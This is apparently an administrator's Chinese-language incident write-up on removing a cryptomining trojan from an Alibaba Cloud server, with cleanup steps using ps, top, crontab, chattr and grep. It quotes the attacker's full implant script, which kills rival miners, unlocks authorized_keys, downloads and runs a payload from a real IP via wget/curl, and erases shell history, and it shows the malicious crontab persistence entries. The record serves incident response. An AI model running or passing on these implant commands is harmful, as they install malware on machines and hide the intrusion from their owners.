背景:
阿里云服务器报警:有木马植入,服务器cpu飙升。
处理:
#木马植入命令:
./network rm -rf /var/tmp/Documents ;
mkdir /var/tmp/Documents 2>&1 ;
crontab -r ;
chattr -iae ~/.ssh/authorized_keys >/dev/null 2>&1 ;
cd /var/tmp ;
chattr -iae /var/tmp/Documents/.diicot ;
pkill Opera ; pkill cnrig ; pkill java ;
killall java ;
pkill xmrig ;
killall cnrig ;
killall xmrig ;
cd /var/tmp/;
mv /var/tmp/diicot /var/tmp/Documents/.diicot ;
mv /var/tmp/kuak /var/tmp/Documents/kuak ;
cd /var/tmp/Documents ;
chmod +x .* ;
/var/tmp/Documents/.diicot >/dev/null 2>&1 & disown ;
history -c ;
rm -rf .bash_history ~/.bash_history ;
rm -rf /tmp/cache ; cd /tmp/ ;
wget -q 85.31.47.99/.NzJjOTYwxx5/.balu || curl -O -s -L 85.31.47.99/.NzJjOTYwxx5/.balu ;
mv .balu cache ; chmod +x cache ;
./cache >/dev/null 2>&1 & disown ;
history -c ;
rm -rf .bash_history ~/.bash_history
命令分析:
补救措施:
1. 关闭服务器ssh端口
2. 查看当前运行的异常进程:
ps aux | grep -E "diicot|kuak|cache|xmrig|cnrig" # 结合恶意脚本中的进程名排查 top/htop # 观察CPU/内存占用异常的进程(如挖矿程序通常占用高资源)
[ecs-assist-user@iZ2zef6hu7zpvvnltbgss3Z ~]$ ps aux | grep -E "diicot|kuak|cache|xmrig|cnrig" root 3836 0.0 0.0 1227348 3340 ? Sl 04:04 0:00 cache www 26335 0.0 0.1 196180 11772 ? S Aug03 0:02 nginx: cache manager process ecs-ass+ 31383 0.0 0.0 112812 988 pts/0 R+ 10:08 0:00 grep --color=auto -E diicot|kuak|cache|xmrig|cnrig
3.强制终止可疑进程(使用进程 ID,如1234):
sudo kill -9 3836
sudo rm -rf /tmp/cache /var/tmp/Documents
//检查是否有其他关联文件或进程复活机制(如定时任务):
sudo crontab -l # 查看当前用户定时任务
sudo ls -la /etc/cron* # 检查系统级定时任务
top结果:
top - 10:20:22 up 64 days, 14:19, 0 users, load average: 15.06, 12.13, 10.91 Tasks: 204 total, 8 running, 195 sleeping, 1 stopped, 0 zombie %Cpu(s): 52.2 us, 47.8 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.1 si, 0.0 st KiB Mem : 7732792 total, 272968 free, 4592416 used, 2867408 buff/cache KiB Swap: 0 total, 0 free, 0 used. 2514492 avail Mem PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 3868 root 20 0 2441952 2.3g 4 S 73.1 31.1 646:32.16 151e8df3 31337 www 20 0 244260 27740 4920 R 47.5 0.4 1:35.97 php-fpm 31458 www 20 0 244256 27244 4920 R 45.8 0.4 0:47.46 php-fpm 31871 www 20 0 244196 27972 4912 R 44.2 0.4 0:34.83 php-fpm 32106 www 20 0 242148 26684 4900 R 43.2 0.3 0:14.48 php-fpm 32182 www 20 0 244196 27088 4848 R 43.2 0.4 0:06.68 php-fpm 31430 www 20 0 242216 26768 4916 R 42.2 0.3 1:49.48 php-fpm 32238 www 20 0 233952 17176 4840 S 10.6 0.2 0:00.32 php-fpm 32102 www 20 0 244256 27208 4876 S 8.3 0.4 0:24.24 php-fpm 31875 www 20 0 242208 25208 4920 S 7.6 0.3 0:30.23 php-fpm 31429 www 20 0 242148 25696 4916 S 7.3 0.3 0:59.79 php-fpm 31874 www 20 0 242148 26692 4884 S 7.3 0.3 0:30.45 php-fpm 31876 www 20 0 242208 25756 4920 S 7.3 0.3 0:51.94 php-fpm 31903 www 20 0 242144 27176 4904 S 7.0 0.4 0:09.00 php-fpm 1117 root 20 0 2436596 17372 6900 S 1.0 0.2 411:08.98 argusagent 24119 root 20 0 231340 83840 10360 S 1.0 1.1 295:33.94 AliYunDunMonito 2036 redis 20 0 565288 249392 1996 S 0.3 3.2 228:12.62 redis-server 22120 root 20 0 686528 9628 5172 S 0.3 0.1 35:45.96 aliyun-service 24086 root 20 0 118508 8144 4832 S 0.3 0.1 85:02.77 AliYunDun 26331 www 20 0 245704 69064 10580 S 0.3 0.9 5:56.22 nginx 26333 www 20 0 250752 74476 10576 S 0.3 1.0 23:57.13 nginx 32232 ecs-ass+ 20 0 162104 2348 1592 R 0.3 0.0 0:00.03 top 1 root 20 0 51868 3664 2144 S 0.0 0.0 9:03.38 systemd
查找151e8df3进程的可执行文件路径:
sudo ls -l /proc/3868/exe # 进程未终止时,通过proc查看执行路径 # 若已终止,搜索系统中类似名称的文件 sudo find / -name "151e8df3" -type f
sudo rm -f /path/to/151e8df3
定时任务的处理:
[ecs-assist-user@iZ2zef6hu7zpvvnltbgss3Z tmp]$ sudo crontab -l @daily /var/tmp/9659fb05/./80ff5709 > /dev/null 2>&1 & disown @reboot /var/tmp/9659fb05/./80ff5709 > /dev/null 2>&1 & disown * * * * * /var/tmp/9659fb05/./80ff5709 > /dev/null 2>&1 & disown @monthly /var/tmp/9659fb05/./80ff5709 > /dev/null 2>&1 & disown [ecs-assist-user@iZ2zef6hu7zpvvnltbgss3Z tmp]$ sudo ls -la /etc/cron* -rw------- 1 root root 0 May 16 2023 /etc/cron.deny -rw-r--r--. 1 root root 451 Jun 10 2014 /etc/crontab/etc/cron.d: total 16 drwxr-xr-x. 2 root root 4096 Jun 28 2024 . drwxr-xr-x. 87 root root 4096 Aug 13 09:54 .. -rw-r--r-- 1 root root 128 May 16 2023 0hourly -rw------- 1 root root 235 Dec 16 2022 sysstat/etc/cron.daily: total 16 drwxr-xr-x. 2 root root 4096 Jun 28 2024 . drwxr-xr-x. 87 root root 4096 Aug 13 09:54 .. -rwx------. 1 root root 219 Apr 1 2020 logrotate -rwxr-xr-x. 1 root root 618 Oct 30 2018 man-db.cron/etc/cron.hourly: total 12 drwxr-xr-x. 2 root root 4096 Jun 28 2024 . drwxr-xr-x. 87 root root 4096 Aug 13 09:54 .. -rwxr-xr-x 1 root root 392 May 16 2023 0anacron/etc/cron.monthly: total 8 drwxr-xr-x. 2 root root 4096 Jun 10 2014 . drwxr-xr-x. 87 root root 4096 Aug 13 09:54 ../etc/cron.weekly: total 8 drwxr-xr-x. 2 root root 4096 Jun 10 2014 . drwxr-xr-x. 87 root root 4096 Aug 13 09:54 ..
sudo crontab -r # 清除当前用户(root)的所有定时任务
sudo rm -rf /var/tmp/9659fb05 # 删除整个恶意程序目录
4.禁用恶意文件执行权限
chmod -x /var/tmp/Documents/.* /tmp/cache rm -rf /var/tmp/Documents /tmp/cache
5.查看/etc/rc.local等开机启动脚本:
sudo cat /etc/rc.local
6.木马禁止删除:
[ecs-assist-user@iZ2zef6hu7zpvvnltbgss3Z f46a6fbd]$ sudo rm -rf /var/tmp/f46a6fbd/ rm: cannot remove ‘/var/tmp/f46a6fbd/80ff5709’: Operation not permitted
# 进入目录 cd /var/tmp/f46a6fbd/# 查看文件属性(若有i或a属性,需移除) lsattr 80ff5709# 移除特殊属性(-i移除不可修改,-a移除仅追加) sudo chattr -ia 80ff5709
7.扫描代码篡改
# 搜索近期新增的可疑PHP文件(如包含eval、base64_decode等危险函数的文件) sudo find /path/to/website -name "*.php" -mtime -7 # 查找7天内新增的PHP文件 sudo grep -r "eval(" /path/to/website # 搜索包含危险函数的文件